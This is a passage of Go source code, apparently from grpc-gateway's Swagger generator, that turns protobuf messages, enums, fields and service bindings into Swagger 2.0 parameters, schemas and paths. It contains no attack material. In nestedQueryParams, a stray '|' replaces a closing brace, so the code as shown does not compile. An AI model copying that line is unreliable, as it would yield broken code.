".google.protobuf.Empty": schemaCore{},
".google.protobuf.Struct": schemaCore{
Type: "object",
},
".google.protobuf.Value": schemaCore{
Type: "object",
},
".google.protobuf.ListValue": schemaCore{
Type: "array",
Items: (*swaggerItemsObject)(&schemaCore{
Type: "object",
}),
},
".google.protobuf.NullValue": schemaCore{
Type: "string",
},
}
func listEnumNames(enum *descriptor.Enum) (names []string) {
for _, value := range enum.GetValue() {
names = append(names, value.GetName())
}
return names
}
func listEnumNumbers(enum *descriptor.Enum) (numbers []string) {
for _, value := range enum.GetValue() {
numbers = append(numbers, strconv.Itoa(int(value.GetNumber())))
}
return
}
func getEnumDefault(enum *descriptor.Enum) string {
for _, value := range enum.GetValue() {
if value.GetNumber() == 0 {
return value.GetName()
}
}
return ""
}
// messageToQueryParameters converts a message to a list of swagger query parameters.
func messageToQueryParameters(message *descriptor.Message, reg *descriptor.Registry, pathParams []descriptor.Parameter) (params []swaggerParameterObject, err error) {
for _, field := range message.Fields {
p, err := queryParams(message, field, "", reg, pathParams)
if err != nil {
return nil, err
}
params = append(params, p...)
}
return params, nil
}
// queryParams converts a field to a list of swagger query parameters recursively through the use of nestedQueryParams.
func queryParams(message *descriptor.Message, field *descriptor.Field, prefix string, reg *descriptor.Registry, pathParams []descriptor.Parameter) (params []swaggerParameterObject, err error) {
return nestedQueryParams(message, field, prefix, reg, pathParams, map[string]bool{})
}
// nestedQueryParams converts a field to a list of swagger query parameters recursively.
// This function is a helper function for queryParams, that keeps track of cyclical message references
// through the use of
// touched map[string]bool
// If a cycle is discovered, an error is returned, as cyclical data structures aren't allowed
// in query parameters.
func nestedQueryParams(message *descriptor.Message, field *descriptor.Field, prefix string, reg *descriptor.Registry, pathParams []descriptor.Parameter, touched map[string]bool) (params []swaggerParameterObject, err error) {
// make sure the parameter is not already listed as a path parameter
for _, pathParam := range pathParams {
if pathParam.Target == field {
return nil, nil
}
}
schema := schemaOfField(field, reg, nil)
fieldType := field.GetTypeName()
if message.File != nil {
comments := fieldProtoComments(reg, message, field)
if err := updateSwaggerDataFromComments(reg, &schema, message, comments, false); err != nil {
return nil, err
}
}
isEnum := field.GetType() == pbdescriptor.FieldDescriptorProto_TYPE_ENUM
items := schema.Items
if schema.Type != "" || isEnum {
if schema.Type == "object" {
return nil, nil // TODO: currently, mapping object in query parameter is not supported
}
if items != nil && (items.Type == "" || items.Type == "object") && !isEnum {
return nil, nil // TODO: currently, mapping object in query parameter is not supported
}
desc := schema.Description
if schema.Title != "" { // merge title because title of parameter object will be ignored
desc = strings.TrimSpace(schema.Title + ". " + schema.Description)
}
// verify if the field is required
required := false
for _, fieldName := range schema.Required {
if fieldName == field.GetName() {
required = true
break
}
}
param := swaggerParameterObject{
Description: desc,
In: "query",
Default: schema.Default,
Type: schema.Type,
Items: schema.Items,
Format: schema.Format,
Required: required,
}
if param.Type == "array" {
param.CollectionFormat = "multi"
}
if reg.GetUseJSONNamesForFields() {
param.Name = prefix + field.GetJsonName()
} else {
param.Name = prefix + field.GetName()
}
if isEnum {
enum, err := reg.LookupEnum("", fieldType)
if err != nil {
return nil, fmt.Errorf("unknown enum type %s", fieldType)
}
if items != nil { // array
param.Items = &swaggerItemsObject{
Type: "string",
Enum: listEnumNames(enum),
}
if reg.GetEnumsAsInts() {
param.Items.Type = "integer"
param.Items.Enum = listEnumNumbers(enum)
}
} else {
param.Type = "string"
param.Enum = listEnumNames(enum)
param.Default = getEnumDefault(enum)
if reg.GetEnumsAsInts() {
param.Type = "integer"
param.Enum = listEnumNumbers(enum)
param.Default = "0"
}
}
valueComments := enumValueProtoComments(reg, enum)
if valueComments != "" {
param.Description = strings.TrimLeft(param.Description+"\n\n "+valueComments, "\n")
}
}
return []swaggerParameterObject{param}, nil | // nested type, recurse
msg, err := reg.LookupMsg("", fieldType)
if err != nil {
return nil, fmt.Errorf("unknown message type %s", fieldType)
}
// Check for cyclical message reference:
isCycle := touched[*msg.Name]
if isCycle {
return nil, fmt.Errorf("Recursive types are not allowed for query parameters, cycle found on %q", fieldType)
}
// Update map with the massage name so a cycle further down the recursive path can be detected.
touched[*msg.Name] = true
for _, nestedField := range msg.Fields {
var fieldName string
if reg.GetUseJSONNamesForFields() {
fieldName = field.GetJsonName()
} else {
fieldName = field.GetName()
}
p, err := nestedQueryParams(msg, nestedField, prefix+fieldName+".", reg, pathParams, touched)
if err != nil {
return nil, err
}
params = append(params, p...)
}
return params, nil
}
// findServicesMessagesAndEnumerations discovers all messages and enums defined in the RPC methods of the service.
func findServicesMessagesAndEnumerations(s []*descriptor.Service, reg *descriptor.Registry, m messageMap, ms messageMap, e enumMap, refs refMap) {
for _, svc := range s {
for _, meth := range svc.Methods {
// Request may be fully included in query
{
swgReqName, ok := fullyQualifiedNameToSwaggerName(meth.RequestType.FQMN(), reg)
if !ok {
glog.Errorf("couldn't resolve swagger name for FQMN '%v'", meth.RequestType.FQMN())
continue
}
if _, ok := refs[fmt.Sprintf("#/definitions/%s", swgReqName)]; ok {
if !skipRenderingRef(meth.RequestType.FQMN()) {
m[swgReqName] = meth.RequestType
}
}
}
swgRspName, ok := fullyQualifiedNameToSwaggerName(meth.ResponseType.FQMN(), reg)
if !ok && !skipRenderingRef(meth.ResponseType.FQMN()) {
glog.Errorf("couldn't resolve swagger name for FQMN '%v'", meth.ResponseType.FQMN())
continue
}
findNestedMessagesAndEnumerations(meth.RequestType, reg, m, e)
if !skipRenderingRef(meth.ResponseType.FQMN()) {
m[swgRspName] = meth.ResponseType
if meth.GetServerStreaming() {
streamError, runtimeStreamError, err := lookupMsgAndSwaggerName(".grpc.gateway.runtime", "StreamError", reg)
if err != nil {
glog.Error(err)
} else {
glog.V(1).Infof("StreamError: %v", streamError)
glog.V(1).Infof("StreamError FQMN: %s", runtimeStreamError)
m[runtimeStreamError] = streamError
findNestedMessagesAndEnumerations(streamError, reg, m, e)
}
ms[swgRspName] = meth.ResponseType
}
}
findNestedMessagesAndEnumerations(meth.ResponseType, reg, m, e)
}
}
}
// findNestedMessagesAndEnumerations those can be generated by the services.
func findNestedMessagesAndEnumerations(message *descriptor.Message, reg *descriptor.Registry, m messageMap, e enumMap) {
// Iterate over all the fields that
for _, t := range message.Fields {
fieldType := t.GetTypeName()
// If the type is an empty string then it is a proto primitive
if fieldType != "" {
if _, ok := m[fieldType]; !ok {
msg, err := reg.LookupMsg("", fieldType)
if err != nil {
enum, err := reg.LookupEnum("", fieldType)
if err != nil {
panic(err)
}
e[fieldType] = enum
continue
}
m[fieldType] = msg
findNestedMessagesAndEnumerations(msg, reg, m, e)
}
}
}
}
func skipRenderingRef(refName string) bool {
_, ok := wktSchemas[refName]
return ok
}
func renderMessagesAsDefinition(messages messageMap, d swaggerDefinitionsObject, reg *descriptor.Registry, customRefs refMap) {
for name, msg := range messages {
swgName, ok := fullyQualifiedNameToSwaggerName(msg.FQMN(), reg)
if !ok {
panic(fmt.Sprintf("can't resolve swagger name from '%v'", msg.FQMN()))
}
if skipRenderingRef(name) {
continue
}
if opt := msg.GetOptions(); opt != nil && opt.MapEntry != nil && *opt.MapEntry {
continue
}
schema := swaggerSchemaObject{
schemaCore: schemaCore{
Type: "object",
},
}
msgComments := protoComments(reg, msg.File, msg.Outers, "MessageType", int32(msg.Index))
if err := updateSwaggerDataFromComments(reg, &schema, msg, msgComments, false); err != nil {
panic(err)
}
opts, err := extractSchemaOptionFromMessageDescriptor(msg.DescriptorProto)
if err != nil {
panic(err)
}
if opts != nil {
protoSchema := swaggerSchemaFromProtoSchema(opts, reg, customRefs, msg)
// Warning: Make sure not to overwrite any fields already set on the schema type.
schema.ExternalDocs = protoSchema.ExternalDocs
schema.ReadOnly = protoSchema.ReadOnly
schema.MultipleOf = protoSchema.MultipleOf
schema.Maximum = protoSchema.Maximum
schema.ExclusiveMaximum = protoSchema.ExclusiveMaximum
schema.Minimum = protoSchema.Minimum
schema.ExclusiveMinimum = protoSchema.ExclusiveMinimum
schema.MaxLength = protoSchema.MaxLength
schema.MinLength = protoSchema.MinLength
schema.Pattern = protoSchema.Pattern
schema.Default = protoSchema.Default
schema.MaxItems = protoSchema.MaxItems
schema.MinItems = protoSchema.MinItems
schema.UniqueItems = protoSchema.UniqueItems
schema.MaxProperties = protoSchema.MaxProperties
schema.MinProperties = protoSchema.MinProperties
schema.Required = protoSchema.Required
if protoSchema.schemaCore.Type != "" || protoSchema.schemaCore.Ref != "" {
schema.schemaCore = protoSchema.schemaCore
}
if protoSchema.Title != "" {
schema.Title = protoSchema.Title
}
if protoSchema.Description != "" {
schema.Description = protoSchema.Description
}
if protoSchema.Example != nil {
schema.Example = protoSchema.Example
}
}
for _, f := range msg.Fields {
fieldValue := schemaOfField(f, reg, customRefs)
comments := fieldProtoComments(reg, msg, f)
if err := updateSwaggerDataFromComments(reg, &fieldValue, f, comments, false); err != nil {
panic(err)
}
kv := keyVal{Value: fieldValue}
if reg.GetUseJSONNamesForFields() {
kv.Key = f.GetJsonName()
} else {
kv.Key = f.GetName()
}
if schema.Properties == nil {
schema.Properties = &swaggerSchemaObjectProperties{}
}
*schema.Properties = append(*schema.Properties, kv)
}
d[swgName] = schema
}
}
// schemaOfField returns a swagger Schema Object for a protobuf field.
func schemaOfField(f *descriptor.Field, reg *descriptor.Registry, refs refMap) swaggerSchemaObject {
const (
singular = 0
array = 1
object = 2
)
var (
core schemaCore
aggregate int
)
fd := f.FieldDescriptorProto
if m, err := reg.LookupMsg("", f.GetTypeName()); err == nil {
if opt := m.GetOptions(); opt != nil && opt.MapEntry != nil && *opt.MapEntry {
fd = m.GetField()[1]
aggregate = object
}
}
if fd.GetLabel() == pbdescriptor.FieldDescriptorProto_LABEL_REPEATED {
aggregate = array
}
var props *swaggerSchemaObjectProperties
switch ft := fd.GetType(); ft {
case pbdescriptor.FieldDescriptorProto_TYPE_ENUM, pbdescriptor.FieldDescriptorProto_TYPE_MESSAGE, pbdescriptor.FieldDescriptorProto_TYPE_GROUP:
if wktSchema, ok := wktSchemas[fd.GetTypeName()]; ok {
core = wktSchema
if fd.GetTypeName() == ".google.protobuf.Empty" {
props = &swaggerSchemaObjectProperties{}
}
} else {
swgRef, ok := fullyQualifiedNameToSwaggerName(fd.GetTypeName(), reg)
if !ok {
panic(fmt.Sprintf("can't resolve swagger ref from typename '%v'", fd.GetTypeName()))
}
core = schemaCore{
Ref: "#/definitions/" + swgRef,
}
if refs != nil {
refs[fd.GetTypeName()] = struct{}{}
}
}
default:
ftype, format, ok := primitiveSchema(ft)
if ok {
core = schemaCore{Type: ftype, Format: format}
} else {
core = schemaCore{Type: ft.String(), Format: "UNKNOWN"}
}
}
ret := swaggerSchemaObject{}
switch aggregate {
case array:
ret = swaggerSchemaObject{
schemaCore: schemaCore{
Type: "array",
Items: (*swaggerItemsObject)(&core),
},
}
case object:
ret = swaggerSchemaObject{
schemaCore: schemaCore{
Type: "object",
},
AdditionalProperties: &swaggerSchemaObject{Properties: props, schemaCore: core},
}
default:
ret = swaggerSchemaObject{
schemaCore: core,
Properties: props,
}
}
if j, err := extractJSONSchemaFromFieldDescriptor(fd); err == nil {
updateSwaggerObjectFromJSONSchema(&ret, j, reg, f)
}
return ret
}
// primitiveSchema returns a pair of "Type" and "Format" in JSON Schema for
// the given primitive field type.
// The last return parameter is true iff the field type is actually primitive.
func primitiveSchema(t pbdescriptor.FieldDescriptorProto_Type) (ftype, format string, ok bool) {
switch t {
case pbdescriptor.FieldDescriptorProto_TYPE_DOUBLE:
return "number", "double", true
case pbdescriptor.FieldDescriptorProto_TYPE_FLOAT:
return "number", "float", true
case pbdescriptor.FieldDescriptorProto_TYPE_INT64:
return "string", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_UINT64:
// 64bit integer types are marshaled as string in the default JSONPb marshaler.
// TODO(yugui) Add an option to declare 64bit integers as int64.
//
// NOTE: uint64 is not a predefined format of integer type in Swagger spec.
// So we cannot expect that uint64 is commonly supported by swagger processor.
return "string", "uint64", true
case pbdescriptor.FieldDescriptorProto_TYPE_INT32:
return "integer", "int32", true
case pbdescriptor.FieldDescriptorProto_TYPE_FIXED64:
// Ditto.
return "string", "uint64", true
case pbdescriptor.FieldDescriptorProto_TYPE_FIXED32:
// Ditto.
return "integer", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_BOOL:
return "boolean", "boolean", true
case pbdescriptor.FieldDescriptorProto_TYPE_STRING:
// NOTE: in swagger specifition, format should be empty on string type
return "string", "", true
case pbdescriptor.FieldDescriptorProto_TYPE_BYTES:
return "string", "byte", true
case pbdescriptor.FieldDescriptorProto_TYPE_UINT32:
// Ditto.
return "integer", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_SFIXED32:
return "integer", "int32", true
case pbdescriptor.FieldDescriptorProto_TYPE_SFIXED64:
return "string", "int64", true
case pbdescriptor.FieldDescriptorProto_TYPE_SINT32:
return "integer", "int32", true
case pbdescriptor.FieldDescriptorProto_TYPE_SINT64:
return "string", "int64", true
default:
return "", "", false
}
}
// renderEnumerationsAsDefinition inserts enums into the definitions object.
func renderEnumerationsAsDefinition(enums enumMap, d swaggerDefinitionsObject, reg *descriptor.Registry) {
for _, enum := range enums {
swgName, ok := fullyQualifiedNameToSwaggerName(enum.FQEN(), reg)
if !ok {
panic(fmt.Sprintf("can't resolve swagger name from FQEN '%v'", enum.FQEN()))
}
enumComments := protoComments(reg, enum.File, enum.Outers, "EnumType", int32(enum.Index))
// it may be necessary to sort the result of the GetValue function.
enumNames := listEnumNames(enum)
defaultValue := getEnumDefault(enum)
valueComments := enumValueProtoComments(reg, enum)
if valueComments != "" {
enumComments = strings.TrimLeft(enumComments+"\n\n "+valueComments, "\n")
}
enumSchemaObject := swaggerSchemaObject{
schemaCore: schemaCore{
Type: "string",
Enum: enumNames,
Default: defaultValue,
},
}
if reg.GetEnumsAsInts() {
enumSchemaObject.Type = "integer"
enumSchemaObject.Format = "int32"
enumSchemaObject.Default = "0"
enumSchemaObject.Enum = listEnumNumbers(enum)
}
if err := updateSwaggerDataFromComments(reg, &enumSchemaObject, enum, enumComments, false); err != nil {
panic(err)
}
d[swgName] = enumSchemaObject
}
}
// Take in a FQMN or FQEN and return a swagger safe version of the FQMN and
// a boolean indicating if FQMN was properly resolved.
func fullyQualifiedNameToSwaggerName(fqn string, reg *descriptor.Registry) (string, bool) {
registriesSeenMutex.Lock()
defer registriesSeenMutex.Unlock()
if mapping, present := registriesSeen[reg]; present {
ret, ok := mapping[fqn]
return ret, ok
}
mapping := resolveFullyQualifiedNameToSwaggerNames(append(reg.GetAllFQMNs(), reg.GetAllFQENs()...), reg.GetUseFQNForSwaggerName())
registriesSeen[reg] = mapping
ret, ok := mapping[fqn]
return ret, ok
}
// Lookup message type by location.name and return a swagger-safe version
// of its FQMN.
func lookupMsgAndSwaggerName(location, name string, reg *descriptor.Registry) (*descriptor.Message, string, error) {
msg, err := reg.LookupMsg(location, name)
if err != nil {
return nil, "", err
}
swgName, ok := fullyQualifiedNameToSwaggerName(msg.FQMN(), reg)
if !ok {
return nil, "", fmt.Errorf("can't map swagger name from FQMN '%v'", msg.FQMN())
}
return msg, swgName, nil
}
// registriesSeen is used to memoise calls to resolveFullyQualifiedNameToSwaggerNames so
// we don't repeat it unnecessarily, since it can take some time.
var registriesSeen = map[*descriptor.Registry]map[string]string{}
var registriesSeenMutex sync.Mutex
// Take the names of every proto and "uniq-ify" them. The idea is to produce a
// set of names that meet a couple of conditions. They must be stable, they
// must be unique, and they must be shorter than the FQN.
//
// This likely could be made better. This will always generate the same names
// but may not always produce optimal names. This is a reasonably close
// approximation of what they should look like in most cases.
func resolveFullyQualifiedNameToSwaggerNames(messages []string, useFQNForSwaggerName bool) map[string]string {
packagesByDepth := make(map[int][][]string)
uniqueNames := make(map[string]string)
hierarchy := func(pkg string) []string {
return strings.Split(pkg, ".")
}
for _, p := range messages {
h := hierarchy(p)
for depth := range h {
if _, ok := packagesByDepth[depth]; !ok {
packagesByDepth[depth] = make([][]string, 0)
}
packagesByDepth[depth] = append(packagesByDepth[depth], h[len(h)-depth:])
}
}
count := func(list [][]string, item []string) int {
i := 0
for _, element := range list {
if reflect.DeepEqual(element, item) {
i++
}
}
return i
}
for _, p := range messages {
if useFQNForSwaggerName {
// strip leading dot from proto fqn
uniqueNames[p] = p[1:]
} else {
h := hierarchy(p)
for depth := 0; depth < len(h); depth++ {
if count(packagesByDepth[depth], h[len(h)-depth:]) == 1 {
uniqueNames[p] = strings.Join(h[len(h)-depth-1:], "")
break
}
if depth == len(h)-1 {
uniqueNames[p] = strings.Join(h, "")
}
}
}
}
return uniqueNames
}
var canRegexp = regexp.MustCompile("{([a-zA-Z][a-zA-Z0-9_.]*).*}")
// Swagger expects paths of the form /path/{string_value} but grpc-gateway paths are expected to be of the form /path/{string_value=strprefix/*}. This should reformat it correctly.
func templateToSwaggerPath(path string, reg *descriptor.Registry, fields []*descriptor.Field, msgs []*descriptor.Message) string {
// It seems like the right thing to do here is to just use
// strings.Split(path, "/") but that breaks badly when you hit a url like
// /{my_field=prefix/*}/ and end up with 2 sections representing my_field.
// Instead do the right thing and write a small pushdown (counter) automata
// for it.
var parts []string
depth := 0
buffer := ""
jsonBuffer := ""
for _, char := range path {
switch char {
case '{':
// Push on the stack
depth++
buffer += string(char)
jsonBuffer = ""
jsonBuffer += string(char)
break
case '}':
if depth == 0 {
panic("Encountered } without matching { before it.")
}
// Pop from the stack
depth--
buffer += string(char)
if reg.GetUseJSONNamesForFields() &&
len(jsonBuffer) > 1 {
jsonSnakeCaseName := string(jsonBuffer[1:])
jsonCamelCaseName := string(lowerCamelCase(jsonSnakeCaseName, fields, msgs))
prev := string(buffer[:len(buffer)-len(jsonSnakeCaseName)-2])
buffer = strings.Join([]string{prev, "{", jsonCamelCaseName, "}"}, "")
jsonBuffer = ""
}
case '/':
if depth == 0 {
parts = append(parts, buffer)
buffer = ""
// Since the stack was empty when we hit the '/' we are done with this
// section.
continue
}
buffer += string(char)
jsonBuffer += string(char)
default:
buffer += string(char)
jsonBuffer += string(char)
break
}
}
// Now append the last element to parts
parts = append(parts, buffer)
// Parts is now an array of segments of the path. Interestingly, since the
// syntax for this subsection CAN be handled by a regexp since it has no
// memory.
for index, part := range parts {
// If part is a resource name such as "parent", "name", "user.name", the format info must be retained.
prefix := canRegexp.ReplaceAllString(part, "$1")
if isResourceName(prefix) {
continue
}
parts[index] = canRegexp.ReplaceAllString(part, "{$1}")
}
return strings.Join(parts, "/")
}
func isResourceName(prefix string) bool {
words := strings.Split(prefix, ".")
l := len(words)
field := words[l-1]
words = strings.Split(field, ":")
field = words[0]
return field == "parent" || field == "name"
}
func renderServices(services []*descriptor.Service, paths swaggerPathsObject, reg *descriptor.Registry, requestResponseRefs, customRefs refMap, msgs []*descriptor.Message) error {
// Correctness of svcIdx and methIdx depends on 'services' containing the services in the same order as the 'file.Service' array.
for svcIdx, svc := range services {
for methIdx, meth := range svc.Methods {
for bIdx, b := range meth.Bindings {
// Iterate over all the swagger parameters
parameters := swaggerParametersObject{}
for _, parameter := range b.PathParams {
var paramType, paramFormat, desc, collectionFormat, defaultValue string
var enumNames []string
var items *swaggerItemsObject
var minItems *int
switch pt := parameter.Target.GetType(); pt {
case pbdescriptor.FieldDescriptorProto_TYPE_GROUP, pbdescriptor.FieldDescriptorProto_TYPE_MESSAGE:
if descriptor.IsWellKnownType(parameter.Target.GetTypeName()) {
if parameter.IsRepeated() {
return fmt.Errorf("only primitive and enum types are allowed in repeated path parameters")
}
schema := schemaOfField(parameter.Target, reg, customRefs)
paramType = schema.Type
paramFormat = schema.Format
desc = schema.Description
defaultValue = schema.Default
} else {
return fmt.Errorf("only primitive and well-known types are allowed in path parameters")
}
case pbdescriptor.FieldDescriptorProto_TYPE_ENUM:
enum, err := reg.LookupEnum("", parameter.Target.GetTypeName())
if err != nil {
return err
}
paramType = "string"
paramFormat = ""
enumNames = listEnumNames(enum)
if reg.GetEnumsAsInts() {
paramType = "integer"
paramFormat = ""
enumNames = listEnumNumbers(enum)
}
schema := schemaOfField(parameter.Target, reg, customRefs)
desc = schema.Description
defaultValue = schema.Default
default:
var ok bool
paramType, paramFormat, ok = primitiveSchema(pt)
if !ok {
return fmt.Errorf("unknown field type %v", pt)
}
schema := schemaOfField(parameter.Target, reg, customRefs)
desc = schema.Description
defaultValue = schema.Default
}
if parameter.IsRepeated() {
core := schemaCore{Type: paramType, Format: paramFormat}
if parameter.IsEnum() {
var s []string
core.Enum = enumNames
enumNames = s
}
items = (*swaggerItemsObject)(&core)
paramType = "array"
paramFormat = ""
collectionFormat = reg.GetRepeatedPathParamSeparatorName()
minItems = new(int)
*minItems = 1
}
if desc == "" {
desc = fieldProtoComments(reg, parameter.Target.Message, parameter.Target)
}
parameterString := parameter.String()
if reg.GetUseJSONNamesForFields() {
parameterString = lowerCamelCase(parameterString, meth.RequestType.Fields, msgs)
}
parameters = append(parameters, swaggerParameterObject{
Name: parameterString,
Description: desc,
In: "path",
Required: true,
Default: defaultValue,
// Parameters in gRPC-Gateway can only be strings?
Type: paramType,
Format: paramFormat,
Enum: enumNames,
Items: items,
CollectionFormat: collectionFormat,
MinItems: minItems,
})
}
// Now check if there is a body parameter
if b.Body != nil {
var schema swaggerSchemaObject
desc := ""
if len(b.Body.FieldPath) == 0 {
schema = swaggerSchemaObject{
schemaCore: schemaCore{},
}
wknSchemaCore, isWkn := wktSchemas[meth.RequestType.FQMN()]
if !isWkn {
err := schema.setRefFromFQN(meth.RequestType.FQMN(), reg)
if err != nil {
return err
}
} else {
schema.schemaCore = wknSchemaCore
// Special workaround for Empty: it's well-known type but wknSchemas only returns schema.schemaCore; but we need to set schema.Properties which is a level higher.
if meth.RequestType.FQMN() == ".google.protobuf.Empty" {
schema.Properties = &swaggerSchemaObjectProperties{}
}
}
} else {
lastField := b.Body.FieldPath[len(b.Body.FieldPath)-1]
schema = schemaOfField(lastField.Target, reg, customRefs)
if schema.Description != "" {
desc = schema.Description
} else {
desc = fieldProtoComments(reg, lastField.Target.Message, lastField.Target)
}
}
if meth.GetClientStreaming() {
desc += " (streaming inputs)"
}
parameters = append(parameters, swaggerParameterObject{
Name: "body",
Description: desc,
In: "body",
Required: true,
Schema: &schema,
})
} else if b.HTTPMethod == "GET" || b.HTTPMethod == "DELETE" {
// add the parameters to the query string
queryParams, err := messageToQueryParameters(meth.RequestType, reg, b.PathParams)
if err != nil {
return err
}
parameters = append(parameters, queryParams...)
}
pathItemObject, ok := paths[templateToSwaggerPath(b.PathTmpl.Template, reg, meth.RequestType.Fields, msgs)]
if !ok {
pathItemObject = swaggerPathItemObject{}
}
methProtoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.ServiceDescriptorProto)(nil)), "Method")
desc := "A successful response."
var responseSchema swaggerSchemaObject
if b.ResponseBody == nil || len(b.ResponseBody.FieldPath) == 0 {
responseSchema = swaggerSchemaObject{
schemaCore: schemaCore{},
}
// Don't link to a full definition for
// empty; it's overly verbose.
// schema.Properties{} renders it as
// well, without a definition
wknSchemaCore, isWkn := wktSchemas[meth.ResponseType.FQMN()]
if !isWkn {
err := responseSchema.setRefFromFQN(meth.ResponseType.FQMN(), reg)
if err != nil {
return err
}
} else {
responseSchema.schemaCore = wknSchemaCore
// Special workaround for Empty: it's well-known type but wknSchemas only returns schema.schemaCore; but we need to set schema.Properties which is a level higher.
if meth.ResponseType.FQMN() == ".google.protobuf.Empty" {
responseSchema.Properties = &swaggerSchemaObjectProperties{}
}
}
} else {
// This is resolving the value of response_body in the google.api.HttpRule
lastField := b.ResponseBody.FieldPath[len(b.ResponseBody.FieldPath)-1]
responseSchema = schemaOfField(lastField.Target, reg, customRefs)
if responseSchema.Description != "" {
desc = responseSchema.Description
} else {
desc = fieldProtoComments(reg, lastField.Target.Message, lastField.Target)
}
}
if meth.GetServerStreaming() {
desc += "(streaming responses)"
responseSchema.Type = "object"
swgRef, _ := fullyQualifiedNameToSwaggerName(meth.ResponseType.FQMN(), reg)
responseSchema.Title = "Stream result of " + swgRef
props := swaggerSchemaObjectProperties{
keyVal{
Key: "result",
Value: swaggerSchemaObject{
schemaCore: schemaCore{
Ref: responseSchema.Ref,
},
},
},
}
streamErrDef, hasStreamError := fullyQualifiedNameToSwaggerName(".grpc.gateway.runtime.StreamError", reg)
if hasStreamError {
props = append(props, keyVal{
Key: "error",
Value: swaggerSchemaObject{
schemaCore: schemaCore{
Ref: fmt.Sprintf("#/definitions/%s", streamErrDef)},
},
})
}
responseSchema.Properties = &props
responseSchema.Ref = ""
}
tag := svc.GetName()
if pkg := svc.File.GetPackage(); pkg != "" && reg.IsIncludePackageInTags() {
tag = pkg + "." + tag
}
operationObject := &swaggerOperationObject{
Tags: []string{tag},
Parameters: parameters,
Responses: swaggerResponsesObject{
"200": swaggerResponseObject{
Description: desc,
Schema: responseSchema,
},
},
}
if !reg.GetDisableDefaultErrors() {
errDef, hasErrDef := fullyQualifiedNameToSwaggerName(".grpc.gateway.runtime.Error", reg)
if hasErrDef {
// https://github.com/OAI/OpenAPI-Specification/blob/3.0.0/versions/2.0.md#responses-object
operationObject.Responses["default"] = swaggerResponseObject{
Description: "An unexpected error response",
Schema: swaggerSchemaObject{
schemaCore: schemaCore{
Ref: fmt.Sprintf("#/definitions/%s", errDef),
},
},
}
}
}
operationObject.OperationID = fmt.Sprintf("%s_%s", svc.GetName(), meth.GetName())
if reg.GetSimpleOperationIDs() {
operationObject.OperationID = fmt.Sprintf("%s", meth.GetName())
}
if bIdx != 0 {
// OperationID must be unique in an OpenAPI v2 definition.
operationObject.OperationID += strconv.Itoa(bIdx + 1)
}
// Fill reference map with referenced request messages
for _, param := range operationObject.Parameters {
if param.Schema != nil && param.Schema.Ref != "" {
requestResponseRefs[param.Schema.Ref] = struct{}{}
}
}
methComments := protoComments(reg, svc.File, nil, "Service", int32(svcIdx), methProtoPath, int32(methIdx))
if err := updateSwaggerDataFromComments(reg, operationObject, meth, methComments, false); err != nil {
panic(err)
}
opts, err := extractOperationOptionFromMethodDescriptor(meth.MethodDescriptorProto)
if opts != nil {
if err != nil {
panic(err)
}
operationObject.ExternalDocs = protoExternalDocumentationToSwaggerExternalDocumentation(opts.ExternalDocs, reg, meth)
// TODO(ivucica): this would be better supported by looking whether the method is deprecated in the proto file
operationObject.Deprecated = opts.Deprecated
if opts.Summary != "" {
operationObject.Summary = opts.Summary
}
if opts.Description != "" {
operationObject.Description = opts.Description
}
if len(opts.Tags) > 0 {
operationObject.Tags = make([]string, len(opts.Tags))
copy(operationObject.Tags, opts.Tags)
}
if opts.OperationId != "" {
operationObject.OperationID = opts.OperationId
}
if opts.Security != nil {
newSecurity := []swaggerSecurityRequirementObject{}
if operationObject.Security != nil {
newSecurity = *operationObject.Security
}
for _, secReq := range opts.Security {
newSecReq := swaggerSecurityRequirementObject{}
for secReqKey, secReqValue := range secReq.SecurityRequirement {
if secReqValue == nil {
continue
}
newSecReqValue := make([]string, len(secReqValue.Scope))
copy(newSecReqValue, secReqValue.Scope)
newSecReq[secReqKey] = newSecReqValue
}
if len(newSecReq) > 0 {
newSecurity = append(newSecurity, newSecReq)
}
}
operationObject.Security = &newSecurity
}
if opts.Responses != nil {
for name, resp := range opts.Responses {
// Merge response data into default response if available.
respObj := operationObject.Responses[name]
if resp.Description != "" {
respObj.Description = resp.Description
}
if resp.Schema != nil {
respObj.Schema = swaggerSchemaFromProtoSchema(resp.Schema, reg, customRefs, meth)
}
if resp.Examples != nil {
respObj.Examples = swaggerExamplesFromProtoExamples(resp.Examples)
}
if resp.Extensions != nil {
exts, err := processExtensions(resp.Extensions)
if err != nil {
return err
}
respObj.extensions = exts
}
operationObject.Responses[name] = respObj
}
}
if opts.Extensions != nil {
exts, err := processExtensions(opts.Extensions)
if err != nil {
return err
}
operationObject.extensions = exts
}
if len(opts.Produces) > 0 {
operationObject.Produces = make([]string, len(opts.Produces))
copy(operationObject.Produces, opts.Produces)
}
// TODO(ivucica): add remaining fields of operation object
}
switch b.HTTPMethod {
case "DELETE":
pathItemObject.Delete = operationObject
break
case "GET":
pathItemObject.Get = operationObject
break
case "POST":
pathItemObject.Post = operationObject
break
case "PUT":
pathItemObject.Put = operationObject
break
case "PATCH":
pathItemObject.Patch = operationObject
break
}
paths[templateToSwaggerPath(b.PathTmpl.Template, reg, meth.RequestType.Fields, msgs)] = pathItemObject
}
}
}
// Success! return nil on the error object
return nil
}
// This function is called with a param which contains the entire definition of a method.
func applyTemplate(p param) (*swaggerObject, error) {
// Create the basic template object. This is the object that everything is
// defined off of.
s := swaggerObject{
// Swagger 2.0 is the version of this document
Swagger: "2.0",
Consumes: []string{"application/json"},
Produces: []string{"application/json"},
Paths: make(swaggerPathsObject),
Definitions: make(swaggerDefinitionsObject),
Info: swaggerInfoObject{
Title: *p.File.Name,
Version: "version not set",
},
}
// Loops through all the services and their exposed GET/POST/PUT/DELETE definitions
// and create entries for all of them.
// Also adds custom user specified references to second map.
requestResponseRefs, customRefs := refMap{}, refMap{}
if err := renderServices(p.Services, s.Paths, p.reg, requestResponseRefs, customRefs, p.Messages); err != nil {
panic(err)
}
messages := messageMap{}
streamingMessages := messageMap{}
enums := enumMap{}
if !p.reg.GetDisableDefaultErrors() {
// Add the error type to the message map
runtimeError, swgRef, err := lookupMsgAndSwaggerName(".grpc.gateway.runtime", "Error", p.reg)
if err == nil {
messages[swgRef] = runtimeError
} else {
// just in case there is an error looking up runtimeError
glog.Error(err)
}
}
// Find all the service's messages and enumerations that are defined (recursively)
// and write request, response and other custom (but referenced) types out as definition objects.
findServicesMessagesAndEnumerations(p.Services, p.reg, messages, streamingMessages, enums, requestResponseRefs)
renderMessagesAsDefinition(messages, s.Definitions, p.reg, customRefs)
